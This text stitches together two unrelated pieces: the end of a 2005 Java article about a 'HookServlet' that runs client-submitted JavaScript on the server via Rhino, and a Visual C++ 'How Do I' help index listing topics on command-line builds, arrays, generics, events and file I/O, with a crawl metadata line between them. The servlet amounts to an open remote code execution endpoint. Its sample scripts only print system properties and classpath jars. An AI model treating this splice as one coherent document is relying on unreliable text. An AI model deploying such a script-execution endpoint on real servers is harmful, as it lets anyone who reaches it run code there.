image hook.jpg) are stored in the top-level directory.
- The HookServlet is stored in the WEB-INF/classes
directory.
- The Rhino library (consisting of two files: js.jar and
xbeans.jar) is added in the WEB-INF/lib
directory.
In the deployment descriptor web.xml, we just add a few
lines to enable the servlet.
... <servlet> <servlet-name>HookServlet</servlet-name> <servlet-class>HookServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>HookServlet</servlet-name> <url-pattern>/hook</url-pattern> </servlet-mapping> ...
The full path to access the
HookServlet will now
depend on the name of your WAR file and the web server's URL. For
example, if we are running Apache Tomcat on the standard 8080 port
and the WAR file is named webapplication.war, the path to the
servlet would be:
And the path to the HTML page would be:
Running the HookServlet
Once you have the
HookServlet installed in your web
server or servlet container, you can start exploring the resources,
libraries, and API by writing simple programs.
In this section, I will provide two short examples. I will
deliberately keep them uncomplicated to avoid generating any
confusion, confident that you can see beyond their simplicity and
get the gist of this technique.
Example: Getting the
System Properties
The first example shows how to get the get
System properties
with which your web server was started. This is particularly useful
when a certain behavior of the system is dependant on a
System
property that might not have been properly set.
// importing. var System = java.lang.System; var Arrays = java.util.Arrays; // getting the properties and ordering them. var props = System.getProperties(); var keys = props.keySet().toArray(); Arrays.sort(keys); // printing the content. out.println("<HTML><BODY><PRE>"); for (var i=0;i<keys.length;i++) { out.println(keys[i]+" --> "+ props.get(keys[i])); } out.println("</PRE></BODY></HTML>");
Copy and paste the example above and you will get an answer that
looks something like Figure 2:
Figure 2. Output from the HookServlet: Showing the
System
Properties
Example: Listing the .jars to Start up Tomcat
The second example assumes you are running Apache Tomcat as your
web server. The code first gets the
ClassLoader
instance responsible for loading the
HttpResponse
class, and then (because it knows the
classLoader instance is a
subclass of the
URLClassLoader) gets and prints each
URL in it.
var loader = httpResponse.getClass().getClassLoader(); var urls = loader.getURLs(); out.println("<pre>"); for (var i=0;i<urls.length;i++) { out.println ( urls[i] ); } out.println("</pre>");
This produces an output like Figure 3:
Figure 3. Output from the HookServlet: .jars used to start up
Tomcat
Conclusions
In this article, we have shown a powerful technique that allows
the developer to interact dynamically with any Java
web application. The technique is based on the idea of sending
scripts from the client side to run on the server side. The
implementation we presented uses JavaScript to interpret the server-side scripts, although with a little effort it could be easily
adapted to use a different scripting language for Java.
The final result is a useful tool to help you working with any
Java web application at any stage of the development: the
HookServlet.
A final observation: the
HookServlet is so
intrinsically powerful that almost any servlet could be replaced by
it ("almost" because in our current implementation the JavaScript
can only override the
doPost method and none of the
other methods in the servlet). All of the work would therefore be
done in the HTML page that would embed both the client-side and
the server-side scripts. While this might not be the best solution
in many cases, there's much to be said about having client-side and
server-side code in one unique place and treating the server-side
as a collection of .jars and other resources ready to be
exploited.
Resources
- Sample code for this article
(includes HookServlet source and class, HTML and image for upload
page, and web.xml descriptor)
- Rhino JavaScript
engine
- Java Servlet
Technology
- Apache
Tomcat
- Login or register to post comments
- Printer-friendly version
- 6043 reads | https://today.java.net/pub/a/today/2005/09/23/dynamic-web-app-interaction.html | CC-MAIN-2015-14 | refinedweb | 1,643 | 57.87 |
How to Save Data to MySQL Database- Python Web Scraping
How to Save Data to MySQL Database- Python Web Scraping
Send download link to:
In one of our previous tutorials we saw how to save data to CSV and Excel files. In this tutorial we will learn how we can save data to MYSQL database directly from Python and Jupyter Notebook.
MySQL is an open-source relational database management system (RDBMS)..
To download and setup MySQL db please go to website and follow the instruction.
Also if you are not comfortable with writing SQL query in command line to work with MySQL we recommend you to use Navicat software. Using this you can easily view your database, tables, create new db, tables etc. You can download it here.
Once Navicat is installed open it and create a connection to MySQL db by clicking on connection:
It will ask for name for the connection and a username and password. Notedown the username and password as we will need it in python code. Once a connection is established, create a database and name it “scraping” as highlighted above. Now your database is ready and you can start creating tables and storing data into it.
First let’s go to the webpage and inspect the data we want to scrape:
We want to grab the data in IFPI 2017 Data table, which is a tabular data. As we can see the name of columns is under theadtag and rest of the data is under tbody tag.So using these two tags and writing for loop we can scrap the data.
We will use pymysql module to connect with MySQL using Python.
Below is the detailed code for scraping and saving data to Database. For detailed explanation watch the video:
import bs4 import urllib.request from urllib.request import urlopen from bs4 import BeautifulSoup as soup #Go to webpage and scrape data html = urlopen('') bsobj = soup(html.read()) tbody = bsobj('table',{'class':'wikitableplainrowheaders sortable'})[0].findAll('tr') xl = [] for row in tbody: cols = row.findChildren(recursive = False) cols = tuple(element.text.strip().replace('%','') for element in cols) xl.append(cols) xl = xl[1:-1] #install pymysql module to connect with MySQL Database pip install pymysql import pymysql # Store credantials in file my.propertiesans use Config parser to read from it import configparser config = configparser.RawConfigParser() config.read(filenames = 'my.properties') print(config.sections()) h = config.get('mysql','host') u = config.get('mysql','user') p = config.get('mysql','password') db = config.get('mysql','db') # Open database connection scrap_db = pymysql.connect(h,u,p,db) # prepare a cursor object using cursor() method cursor = scrap_db.cursor() # Drop table if it already exist using execute() method. cursor.execute("DROP TABLE IF EXISTS WIKI2 ") # Create table as per requirement sql = """CREATE TABLE WIKI2 ( RANKINGINT, MARKETCHAR(50), RETAIL_VALUECHAR(20), PHYSICALINT, DIGITALINT, PERFORMANCE_RIGHTSINT, SYNCHRONIZATIONINT )""" cursor.execute(sql) #Save data to the table scrap_db = pymysql.connect(h,u,p,db) mySql_insert_query = """INSERT INTO WIKI2 (RANKING, MARKET, RETAIL_VALUE, PHYSICAL,DIGITAL,PERFORMANCE_RIGHTS,SYNCHRONIZATION) VALUES (%s, %s, %s, %s ,%s, %s, %s) """ records_to_insert = xl cursor = scrap_db.cursor() cursor.executemany(mySql_insert_query, records_to_insert) scrap_db.commit() print(cursor.rowcount, "Record inserted successfully into WIKI2 table") # disconnect from server scrap_db.close()
Hope you enjoyed our tutorial to save data in to MySQL database. We have years of experience in data scraping services and make this tutorial series for learning purpose. In case of any doubt contact us we are ready to serve you. | https://www.worthwebscraping.com/how-to-save-data-to-mysql-database-python-web-scraping/ | CC-MAIN-2022-05 | refinedweb | 574 | 50.23 |
NAME
ng_async - asynchronous framing netgraph node type
SYNOPSIS
#include <sys/types.h> #include <netgraph/ng_async.h>
DESCRIPTION
The async node type performs conversion between synchronous frames and asynchronous frames, as defined for the PPP protocol in RFC 1662. Asynchronous framing uses flag bytes and octet-stuffing to simulate a frame oriented connection over an octet-oriented asynchronous serial line. The node transmits and receives asynchronous data on the async hook. Mbuf boundaries of incoming data are ignored. Once a complete packet has been received, it is decoded and stripped of all framing bytes, and transmitted out the sync hook as a single frame. Synchronous frames are transmitted and received on the sync hook. Packets received on this hook are encoded as asynchronous frames and sent out on async. Received packets should start with the address and control fields, or the PPP protocol field if address and control field compression is employed, and contain no checksum field. If the first four bytes are 0xff 0x03 0xc0 0x21 (an LCP protocol frame) then complete control character escaping is enabled for that frame (in PPP, LCP packets are always sent with no address and control field compression and all control characters escaped). This node supports “flag sharing” for packets transmitted on async. This is an optimization where the trailing flag byte of one frame is shared with the opening flag byte of the next. Flag sharing between frames is disabled after one second of transmit idle time.
HOOKS
This node type supports the following hooks: async Asynchronous connection. Typically this hook would be connected to a ng_tty(4) node, which handles transmission of serial data over a tty device. sync Synchronous connection. This hook sends and receives synchronous frames. For PPP, these frames should contain address, control, and protocol fields, but no checksum field. Typically this hook would be connected to an individual link hook of a ng_ppp(4) type node.
CONTROL MESSAGES
This node type supports the generic control messages, plus the following: NGM_ASYNC_CMD_GET_STATS This command returns a struct ng_async_stat containing node statistics for packet, octet, and error counts. NGM_ASYNC_CMD_CLR_STATS Clears the node statistics. NGM_ASYNC_CMD_SET_CONFIG Sets the node configuration, which is described by a struct ng_async_cfg: struct ng_async_cfg { u_char enabled; /* Turn encoding on/off */ u_int16_t amru; /* Max receive async frame len */ u_int16_t smru; /* Max receive sync frame len */ u_int32_t accm; /* ACCM encoding */ }; The enabled field enables or disables all encoding/decoding functions (default disabled). When disabled, the node operates in simple “pass through” mode. The amru and smru fields are the asynchronous and synchronous MRU (maximum receive unit) values, respectively. These both default to 1600; note that the async MRU applies to the incoming frame length after asynchronous decoding. The accm field is the asynchronous character control map, which controls the escaping of characters 0x00 thorough 0x1f (default 0xffffffff). NGM_ASYNC_CMD_GET_CONFIG This command returns the current configuration structure.
SHUTDOWN
This node shuts down upon receipt of a NGM_SHUTDOWN control message, or when all hooks have been disconnected.
SEE ALSO
netgraph(4), ng_ppp(4), ng_tty(4), ngctl(8) W. Simpson, PPP in HDLC-link Framing, RFC 1662. W. Simpson, The Point-to-Point Protocol (PPP), RFC 1661.
HISTORY
The ng_async node type was implemented in FreeBSD 4.0.
AUTHORS
Archie Cobbs 〈[email protected]〉 | http://manpages.ubuntu.com/manpages/hardy/man4/ng_async.4.html | CC-MAIN-2015-35 | refinedweb | 540 | 55.95 |
An important feature of SQL Server 2000 is the ability to retrieve XML-formatted metadata that defines the content model (what elements will be present, their nesting structure, and what types of data they contain) of an XML document.
This metadata comes in the form of a well-formed XML document known as an XML-Data schema. It can be returned in queries that use any of the three FOR XML modes, and to get it, you specify the XMLDATA option, as exemplified in Listing 41.6.
SELECT TOP 2 OrderID, OrderDate, CustomerID FROM Orders FOR XML AUTO, XMLDATA go <Schema name="Schema1" xmlns="urn:schemas-microsoft-com:xml-data" xmlns: <ElementType name="Orders" content="empty" model="closed"> <AttributeType name="OrderID" dt: <AttributeType name="OrderDate" dt: <AttributeType name="CustomerID" dt: <attribute type="OrderID"/> <attribute type="OrderDate"/> <attribute type="CustomerID"/> </ElementType> </Schema> <Orders xmlns="x-schema:#Schema1" OrderID="10248" OrderDate="1996-07-04T00:00:00" CustomerID="VINET"/> <Orders xmlns="x-schema:#Schema1" OrderID="10249" OrderDate="1996-07-05T00:00:00" CustomerID="TOMSP"/>
First note that the schema is always output directly on top of your XML results. Schema is always its root element, and its name attribute has a special function: It declares the document as a namespace. When a namespace is used, elements in other XML documents might contain the elements defined in this schema by specifying the name of the schema as the value of their xmlns (XML Namespace) attribute.
Orders elements, for example, are linked to Schema1 by way of their xmlns attribute. The value of xmlns (preceded by "x-schema:") points back to the schema as a way of indicating that the metadata in the schema applies to Orders elements. The # sign indicates that the schema is inline (it works just like the # sign does in HTML links) or contained within the XML document it describes. (Note also that schemas themselves refer to a Microsoft namespace in their xmlns attribute.)
The name attribute will always have a value of Schema followed by an integer. This integer is incremented automatically by SQL Server after every query generated during the same session to prevent what is known as a namespace collision?when two XML documents declare the same namespace. It's necessary to rename the schema in this way because it differentiates one schema from any other that might have been produced by a query executed during the same SQL Server session.
The structure of the schema provides useful information about the XML. The values of its elements and attributes will differ depending on the mode and options you specify in the FOR XML clause. The elements that will be present (as of this writing?please note that the specification for XML Schemas is a work in progress) are as follows:
ElementType?For every XML element, an ElementType element that defines it is produced. It has the following attributes:
[View full width]<ElementType content="{empty | textOnly | eltOnly | mixed}" dt:
The most useful attribute of ElementType is dt:type. It tells any code you use to process the schema what kind of data the element named in its name attribute contains. When you convert the schema using an XML stylesheet, for example, it is far easier to generically parse XML elements based on the value of dt:type than by testing the element's value.
The value of dt:type is a string representation of the XML datatype to which the SQL Server datatype of the selected column corresponds. The most common are dateTime?corresponding to datetime, i4?a four-byte integer corresponding to int, and string?corresponding to varchar. See the MSDN Online topic titled "XML Data Types" for more information.
The content attribute is also of interest. It specifies how the XML for the named element is formed?whether it is empty (contains no data), textOnly (contains only data but no child elements), eltOnly (contains elements only) or mixed (contains both data and child elements).
AttributeType? ElementType elements contain these elements. They specify the name and type of any attributes that the element specified in its name attribute have.
attribute? ElementType elements contain these elements. They define an element's attributes and refer back to AttributeType via their type attribute.
Knowing these things about your XML results before parsing them enables you to write generic processing code that is far more likely to be reused than code that is purely data-specific. | http://etutorials.org/SQL/microsoft+sql+server+2000/Part+VI+Additional+SQL+Server+Features/Chapter+41.+Using+XML+in+SQL+Server+2000/Retrieving+XML-Data+Schemas/ | CC-MAIN-2017-04 | refinedweb | 734 | 52.39 |
System.out.println(exp); is used to display messages to the command window. If we go further to the functioning of
System.out.println() statement, we will find that:
1.
System is a class built into the core Java language and it is defined within the
java.lang package.
2.
out is a
public
static member of the
System class, of type
PrintStream. Thus, the expression
System.out refers to an object of type
PrintStream.
3. The (overloaded)
println method of the
PrintStream class accepts an expression as an argument and displays it in
String form to the standard output window (i.e., the command-line window from which the program was invoked). There are multiple
println overloaded methods with different arguments. Every
println makes a call to
write() and
write() takes care of displaying data to the standard output window.
We therefore don't need to ever instantiate a
System object to print messages to the screen; we simply call the
println method on the
System class's
public
static
PrintStream member,
out.
Now, you might be thinking that can we create an object of
PrintStream and call
println function with that object to print to the standard output (usually the console)? The answer is NO. When you want to print to the standard output, then you will use
System.out. That's the only way. Instantiating a
PrintStream will allow you to write to a
File or
OutputStream you specify, but don't have anything to do with the console.
However, you can pass
System.out to
PrintStream and then invoke
println on
PrintStream object to print to the standard output. Following is a small example:
import java.io.*; public class SystemOutPrintlnDemo { public static void main(String[] args) { //creating PrintStream object PrintStream ps = new PrintStream(System.out); ps.println("Hello World!"); ps.print("Hello World Again!"); //Flushes the stream ps.flush(); } } OUTPUT ====== D:\JavaPrograms>javac SystemOutPrintlnDemo.java D:\JavaPrograms>java SystemOutPrintlnDemo Hello World! Hello World Again!
Hope you have enjoyed reading about the working of
System.out.println. | http://cs-fundamentals.com/tech-interview/java/how-system-out-println-work-in-java.php | CC-MAIN-2018-17 | refinedweb | 340 | 59.9 |
LimPy
Limited Python
LimPy parses a limited version of the Python grammar. It supports basic Python syntax, but is known not to support the following:
- classes
- function definition
- multi-variable assignment
- list and generator comprehensions
The goal is to be able to expose various Python objects to a scripting environment where non-professional programmers can write simple code to solve various problems.
Origins
LimPy originated in a survey system at YouGov where it gave the users scripting questionnaires the ability to include various bits of Python code that is executed during survey interviews.
A previous version of the survey system allowed Python code but it was not type checked and non-syntactical bugs were only reached at run time.
LimPy was successful in still offering much of the power of Python at runtime but checking types, operations on types, and function/method call signatures before runtime to ensure that an entire class of bugs was avoided.
Role
LimPy checks code. You supply it with a namespace of helper objects, another namespace of variables and source code and it will raise various LimPy exceptions if there are problems or return the parsed code and the updated namespace of variables if there were new variables defined in the source.
LimPy does not execute the code. That is up to your runtime system to handle. The returned variables namespace contains only types as values, not real runtime values. Deciding what to do with that namespace is up to your runtime code.
Because LimPy is a strict subset of Python, it can typically be exec'd directly by Python.
Testing
LimPy includes some unit tests. To run them, simply invoke setup.py test or install the latest pytest. See the jenkins script for the routine used at YouGov to perform continuous integration testing on this project.
Changes
2.0
- Added limpy.types.Signature, which replaces build_sig, SigInfo, and signature functions. Any code that uses or references these deprecated functions will need to be updated.
- TypeSpecification.add_method now only accepts a Signature instance.
- LimPy now expects all dynamically-dispatched types to be classes that must provide IDynamicType (and need not necessarily be subclasses of DynamicDispatch).
Clients upgrading to LimPy 2.0 will typically just need to update their @limpy.types.signature decorators to instead use @limpy.types.Signature. Any calls to a TypeSpecification.add_method will need to first construct a Signature instance (with the same parameters).
For libraries that do more intimate things with the signatures, it will be necessary to update those references. See the repository changelog for details on how this was done within the LimPy project itself.
1.2.2
- Improved newline counting and tests.
- Empty source or source only comments is now valid LimPy.
1.2.1
- Restored Python 2.5 compatibility.
1.2
- Updated to PLY 3.4
- Now by default LimPy does not write files to the current directory.
1.1
- LimPy no longer allows assignment to Python reserved words. | https://bitbucket.org/yougov/limpy/src/a7bfee50e6e5?at=2.0b9 | CC-MAIN-2015-27 | refinedweb | 491 | 57.57 |
How To Create PDFs in Rails
We worked with The Bill of Rights Institute recently to create an interactive digital course for American History teachers. One of the interesting challenges, among many, stemmed from the fact that the project had large sections of readable content. One of our goals was to make it easy for students and teachers to print out their reading material if and when they’re not able to read it on screen.
To make printing possible, I needed to create PDF files that were similar to the HTML content. These files needed to be both viewable in the browser and downloadable from the page the content lived on. In some cases, we wanted to selectively remove some elements from the page or apply a slightly different stylesheet for printing the content.
After a bit of research, I found two possible approaches:
- Generate a PDF “by hand” from source data using a tool like prawn
- Take a source HTML document and transform that into a PDF
Taking the source HTML document and converting sounded ideal, because I wanted to keep similar CSS styling and layout of the page with minimal modifications. Since prawn is not an HTML to PDF generator, I investigated the following tools:
- Prince — A command line tool that can take an HTML source file from disk and turn it into a PDF. It can read from a local file or a URL. However, it’s pretty pricey; a server license carries a one-time fee of $3800.
- DocRaptor — Basically, this is Prince offered as a service.
- wkhtmltopdf — A free option that uses the WebKit rendering engine within QT.
wkhtmltopdf sounded like the best option to explore since it uses a browser engine to render the page and then save as a PDF. I found two Ruby gems that use this library: PDFKit & Wicked PDF.
I initially started using PDFKit and its included middleware, and I was able to very quickly get viewable and downloadable PDFs.
I enjoyed that the necessary binary files are included with the gem for a number of operating system environments, which saves you from having to install different packages in your respective application environments (OS X vs Ubuntu).
While PDFKit worked great at first, I eventually encountered a roadblock: I needed to be able to include different stylesheets & layouts for different "types" of PDF files, which PDFKit didn’t have any mention of supporting. I was also struggling to get asset paths working correctly on Heroku. The PDF generation actually happens in a separate process, so I somehow needed to use absolute URLs for paths to all assets.
After a bit of searching, I found the excellent Wicked PDF gem.
Wicked PDF
Wicked PDF doesn't package the binaries in the main gem, but it's simple to include the binaries that you need (you can grab from PDFKit gem) in your bin/ directory and set up Wicked PDF like:
platform = RUBY_PLATFORM if platform.include?("darwin") # OS X machine binary_path = Rails.root.join('bin', 'wkhtmltopdf-0.9.9-OS-X-i386').to_s elsif platform.include?("64-linux") # 64-bit linux machine binary_path = Rails.root.join('bin', 'wkhtmltopdf-amd64').to_s end WickedPdf.config = { :exe_path => binary_path }
Wicked PDF also has the optional middleware, but I decided to not use it so that I could have more fine-grained control over where PDF files can be accessed and specifying their layout and template for each "type."
Viewing PDFs in the browser:
respond_to do |format| format.pdf do render :pdf => "my_pdf_name.pdf", :disposition => "inline", :template => "controller_name/show.pdf.erb", :layout => "pdf_layout.html" end format.html end
Downloading PDFs as a file:
def download html = render_to_string(:action => :show, :layout => "pdf_layout.html") pdf = WickedPdf.new.pdf_from_string(html) send_data(pdf, :filename => "my_pdf_name.pdf", :disposition => 'attachment') end
Wicked PDF also includes examples and a handy helper method for specifying assets and substituting them inline into the HTML document:
<%= wicked_pdf_stylesheet_link_tag "my_styles" %> &
<%= wicked_pdf_javascript_include_tag "my_scripts" %>
It also allows for easily debugging the PDF page by viewing it as an HTML page. You can do this by using the described option:
:show_as_html => params[:debug].present?
This allows you to simply add a
?debug=true to the end of your path. Example:...
Ultimately, I found Wicked PDF to be the best choice due to: ease of setup, ease of using different layouts and assets for PDFs, and excellent documentation and examples. Some of the examples included how to use assets on Heroku, assets from a CDN, using the asset helper methods, and how to generate and download files using
send_file.
Have you worked on a similar project? Any input on best solutions? Let us know in the comments below. | https://www.viget.com/articles/how-to-create-pdfs-in-rails/ | CC-MAIN-2018-22 | refinedweb | 776 | 62.68 |
Re: Iterating through an enum???
From: Simon Trew (noneofyour_at_business.guv)
Date: 04/29/04
- ]
Date: Thu, 29 Apr 2004 09:13:20 +0100
"muchan" <[email protected]> wrote in message
news:[email protected]...
>
> Whatever the specification is, and whatever is theoretically possible,
> I stand that "enum" stands for "enumeration", so I'd recommend (myself)
> to enumerate all the possible value in the definition, either used or
> not used in a concrete program.
Well, if there are say 10 "base" values in an enum, each representing a
one-bit flag, then there would be 2^10 = 1024 possible values of the
enumeration, few of which are likely to be used. It seems a bit of overkill
to have to name and specify them.
Are you just unhappy with the idea of enums representing sets of
flags/values? Unfortunately for whatever reason that has become the norm in
C and C++; this mechanism is almost always preferred to using bitfields, for
example. At least we keep all the values together in a logical grouping (the
enum), although I can see the advantage of defining consts in a namespace
instead (because then you have to refer to the enum values through the
namespace scope, like in C++).
>...
It is. (You could have tried it.)
> If combination is infinit (well, always finit within the range of int...)
> and/or too many that it isn't practical to enumerate all, I think i should
> use integer instead of enum from the starting. :)
Well it is part of the common-sense definition of an enumeration that you
can, er, enumerate the items in it, i.e. you can define the contents of the
set by specifiying each of its members rather than having to specify them
with a formula ("set comprehension"). So it seems fair enough that C++
honors this definition by requiring you to enumerate the members of the
enum.
> Or, another (self) guidance would be all the explicite values in enum
> declaration should be defined as constant, either with #define or with
> const int.
I don't know what you think that gains you over defining them in an enum.
> (...and I don't know if const int declaration is treated with compiler
> without allocation in the runtime program...)
>
> so above case
> const int A = 1;
You must be able to get a pointer/reference to A within the program, and to
do that, A would have to be allocated a memory location. But, if you don't
actually get a pointer/reference to A within your program, I think the
compiler is free to get rid of the allocation. i.e. in some programs the
optimizer would be able to replace all uses of A with the const value that A
represents, and then there's no need to allocate memory for A. The optimizer
might not do this if the initialization expression was more complicated than
a simple numeric literal.
I did think that a const delcaration of the form:
const A = 1;
would definitely *not* let you take a pointer/reference to A (you don't know
it's type, for a start). But in VC6 it happily let me take an int* to A.
This might just be a bug.
> I would define entire definition string in macro:
>
> #define ABC_ENUM { a = A, b, c, d, e = E, ae = AE, be, ce, de }
> enum abc ABC_ENUM;
> abc abcarray[] = ABC_ENUM;
Unfortunately the ABC_ENUM is not a valid initialization list for the array.
> Then I'd like to reduce the duplicate memory, so the array declaration
> should be inside the constructor of a class, which wraps the enum from
> global namespace,
>
> ABC::ABC()
> {
> abc abcarray[] = ABC_ENUM; // temporary hold the value in array
> v_abc = std::vector(abcarray); // this is redundant, elements are
copyed twice!
> }
You could just use v_abc.push_back() to put the individual elements in
rather than copy.
for (int i = 0; i < sizeof(abc)/sizeof(abc[0]); ++i)
v_abc.push_back(abc[i]);
- ] | http://www.tech-archive.net/Archive/VC/microsoft.public.vc.language/2004-04/1339.html | crawl-002 | refinedweb | 665 | 59.64 |
Command Line (How Do I in Visual C++)
This page links to help on tasks related to command line development using Visual C++. To view other categories of popular tasks covered in Help, see How Do I in Visual C++.
- Compiling a Native C++ Program from the Command Line (C++)
Demonstrates how to create a simple Visual C++ program with a text editor and compile it on the command line.
- Compiler Options
Introduces cl.exe, a tool that controls the Microsoft C and C++ compilers and linker.
- Linker Options
Introduces LINK, a tool that links Common Object File Format (COFF) object files and libraries to create an executable (.exe) file or dynamic-link library (DLL).
- NMAKE Reference
Introduces the Microsoft Program Maintenance Utility (NMAKE.EXE), a tool that builds projects based on commands contained in a description file.
- NMAKE Features in Visual C++ 2005
Lists the new NMAKE features in Visual C++ 2005.
- VCBUILD Reference
Describes how you can use VCBUILD.exe to build Visual C++ projects and Visual Studio solutions from the command line.
- How to: Run Multiprocessor Builds with VCBUILD
Describes how you can use VCBUILD to run Multiprocessor Builds from the command line.
- Introduction to Visual C++ for UNIX Users
Provides information for UNIX users who are new to Visual C++ and want to become productive with Visual C++.
- Setting the Path and Environment Variables for Command-Line Builds
Describes how to run vcvars32.bat to set up the environment for building on the command line.
Arrays
- How to: Create Single-Dimension Arrays
Shows how to create single-dimension arrays of reference, value, and native pointer types.
- How to: Create Multidimension Arrays
Shows how to create multi-dimension arrays of reference, value, and native pointer types.
- How to: Iterate Over Arrays with for each
Shows how to use the for each, in keyword on different types of arrays.
- How to: Create Arrays of Managed Arrays (Jagged Arrays)
Shows how to create single-dimension arrays of managed array of reference, value, and native pointer types.
- How to: Sort Arrays
Demonstrates how to use the Sort method to sort the elements of an array.
- How to: Sort Arrays Using Custom Criteria
Demonstrates how to sort arrays by implementing the IComparable interface.
- How to: Make Typedefs for Managed Arrays
Shows how to make a typedef for a managed array.
- ... (Variable Argument Lists)
Shows how functions with a variable number of arguments can be implemented in Visual C++ using the ... syntax.
- How to: Use Managed Arrays as Template Type Parameters
Shows how to use a managed array as a parameter to a template.
- How to: Declare and Use Interior Pointers and Managed Arrays
Shows how you can declare and use an interior pointer to an array.
Boxing and Casting
- How to: Use gcnew to Create Value Types and Use Implicit Boxing
Shows how to use gcnew on a value type to create a boxed value type, which can then be placed on the managed, garbage-collected heap.
- How to: Unbox
Shows how to unbox and modify a value.
- How to: Explicitly Request Boxing
Shows how to explicitly request boxing by assigning a variable to a variable of type Object.
- How to: Downcast with safe_cast
Shows how to downcast from a base class to a class derived from the base class using safe_cast.
- How to: Use safe_cast and Boxing
Shows how to use safe_cast to box a value on the CLR heap.
- How to: Use safe_cast and Generic Types
Shows how to use safe_cast to perform a downcast with a generic type.
- How to: Use safe_cast and Unboxing
Shows how to use safe_cast to unbox a value on the CLR heap.
- How to: Use safe_cast and User-Defined Conversions
Shows how to invoke user-defined conversions by using safe_cast.
- How to: Upcast with safe_cast
Shows how to do an upcast—a cast from a derived type to one of its base classes—using safe_cast.
Data Types and Interfaces
- How to: Instantiate Classes and Structs
Demonstrates that reference types and value types can only be instantiated on the managed heap, not on the stack or on the native heap.
- How to: Convert with Constructors
Introduces converting constructors, constructors that take a type and use it to create an object.
- How to: Define an Interface Static Constructor
Introduces static constructors, constructors which can be used to initialize static data members.
- How to: Define Static Constructors in a Class or Struct
Demonstrates how to create a static constructor.
- How to: Write Template Functions that Take Native, Value, or Reference Parameters
Demonstrates that by using a tracking reference in the signature of a template function, you can ensure that the function can be called with parameters whose type are native, CLR value, or CLR reference.
Enumerations
- How to: Specify Underlying Types of Enums
Shows how to specify the underlying type of an enum.
- How to: Convert Between Managed and Standard Enumerations
Demonstrates how to convert between an enum and an integral type by using a cast.
Events and Delegates
- How to: Compose Delegates
Demonstrates how to compose delegates.
- How to: Define and Use Delegates
Demonstrates how to define and use a delegate.
- How to: Define and Use Static Events
Shows how to define and use static events.
- How to: Define Event Accessor Methods
Shows how you can define an event's behavior when handlers are added or removed, and for when an event is raised.
- How to: Implement Abstract Events
Shows how to implement an abstract event.
- How to: Implement Managed Virtual Events
Shows how to implement virtual, managed events in an interface and class.
- How to: Access Events in Interfaces
Shows how to access an event in an interface.
- How to: Add Multiple Handlers to Events
Demonstrates that an event receiver, or any other client code, can add one or more handlers to an event.
- How to: Associate Delegates to Members of a Value Class
Shows how to associate a delegate with a member of a value class.
- How to: Associate Delegates to Unmanaged Functions
Shows how to associate a delegate with a native function by wrapping the native function in a managed type, and declaring the function to be invoked through P/Invoke.
- How to: Override Default Access of add, remove, and raise Methods
Shows how to override the default access on the add, remove, and raise events methods.
- How to: Raise Events Defined in a Different Assembly
Shows how to consume an event and event handler defined in one assembly by another assembly.
Exceptions
- Basic Concepts in Using Managed Exceptions
Discusses the basic concepts for exception handling in managed applications.
- Differences in Exception Handling Behavior Under /CLR
Discusses differences from the standard behavior of exception handling and some restrictions in detail.
- How to: Define and Install a Global Exception Handler
Demonstrates how unhandled exceptions can be captured.
- How to: Catch Exceptions in Native Code Thrown from MSIL
Shows how to catch CLR exceptions in native code with __try and __except.
- finally
Discusses the CLR exception handling finally clause.
For Each
- How to: Iterate Over Arrays with for each
Shows how to use the for each, in keyword on different types of arrays.
- How to: Iterate Over a Generic Collection with for each
Demonstrates how to create generic collections and iterate over them using for each, in.
- How to: Iterate Over a User-Defined Collection with for each
Demonstrates how to iterate over a user-defined collection using for each, in.
- How to: Iterate Over STL Collection with for each
Demonstrates how to iterate over STL collections using for each, in.
Generics
- Overview of Generics in Visual C++
Provides an overview of generics, parameterized types supported by the Common Language Runtime.
- Generic Functions
Discusses generic functions, a function that is declared with type parameters.
- Generic Classes (Visual C++)
Describes how to create a generic class.
- Generic Interfaces (Visual C++)
Describes how to create a generic interface.
- Generic Delegates (Visual C++)
Describes how to create a generic delegate.
- Constraints
Describes that constraints are a requirement that types used as type arguments must satisfy.
- Consuming Generics from Other .NET Languages
Discusses how generics authored in one .NET language may be used in other .NET languages.
- Generics and Templates
Provides an overview of the many differences between generics and templates.
- How to: Convert Generic Classes
Shows how to convert a generic class to T.
Pointers
- How to: Declare Interior Pointers with the const Keyword
Shows how to use const in the declaration of an interior pointer.
- How to: Overload Functions with Interior Pointers and Native Pointers
Demonstrates that functions can be overloaded depending on whether the parameter type is an interior pointer or a native pointer.
- How to: Cannot Use Tracking References and Unary "Take-Address" Operator
Shows that a tracking reference cannot be used as a unary take-address operator.
- How to: Declare Pinning Pointers and Value Types
Shows that you can declare a pinning pointer to a value type object and use a pin_ptr to the boxed value type.
- How to: Declare Value Types with the interior_ptr Keyword
Demonstrates that an interior_ptr can be used with a value type.
- How to: Define the Scope of Pinning Pointers
Demonstrates that an object is pinned only while a pin_ptr points to it.
- How to: Pin Pointers and Arrays
Shows how to pin an array by declaring a pinning pointer to its element type, and pinning one of its elements.
Properties
- How to: Use Simple Properties
Demonstrates that for simple properties—those that merely assign and retrieve a private data member—it is not necessary to explicitly define the get and set accessor functions.
- How to: Use Indexed Properties
Shows how to use default and user defined indexed properties.
- How to: Use Multidimensional Properties
Shows how to create multidimension properties that take a non-standard number of parameters.
- How to: Declare and Use Static Properties
Shows how to declare and use a static property.
- How to: Declare and Use Virtual Properties
Shows how to declare and use virtual properties.
- How to: Declare Abstract and Sealed Properties
Shows how to declare a sealed or abstract property by defining a non-trivial property and specifying the abstract or sealed keywords on the get and set accessor functions.
- How to: Overload Property Accessor Methods
Demonstrates how to overload indexed properties.
Tracking References
- How to: Use Tracking References and Value Types
Shows simple boxing through a tracking reference to a value type.
- How to: Use Tracking References and Interior Pointers
Shows that taking the address of a tracking reference returns an interior_ptr and how to modify and access data through a tracking reference.
- How to: Pass CLR Types by Reference with Tracking References
Shows how to pass CLR types by reference with tracking references.
- How to: Read a Binary File (C++/CLI)
Demonstrates reading binary data from a file.
- How to: Write a Binary File (C++/CLI)
Demonstrates writing binary data to a file.
- How to: Read a Text File (C++/CLI)
Demonstrates how to open and read a text file one line at a time.
- How to: Write a Text File (C++/CLI)
Demonstrates how to create a text file and write text to it using the StreamWriter class.
- How to: Enumerate Files in a Directory (C++/CLI)
Demonstrates how to retrieve a list of the files in a directory.
- How to: Monitor File System Changes (C++/CLI)
Uses FileSystemWatcher to register for events corresponding to files being created, changed, deleted, or renamed.
- How to: Retrieve File Information (C++/CLI)
Demonstrates the FileInfo class. When you have the name of a file, you can use this class to retrieve information about the file such as the file size, directory, full name, and date and time of creation and of the last modification.
- How to: Write Data to the Windows Registry (C++/CLI)
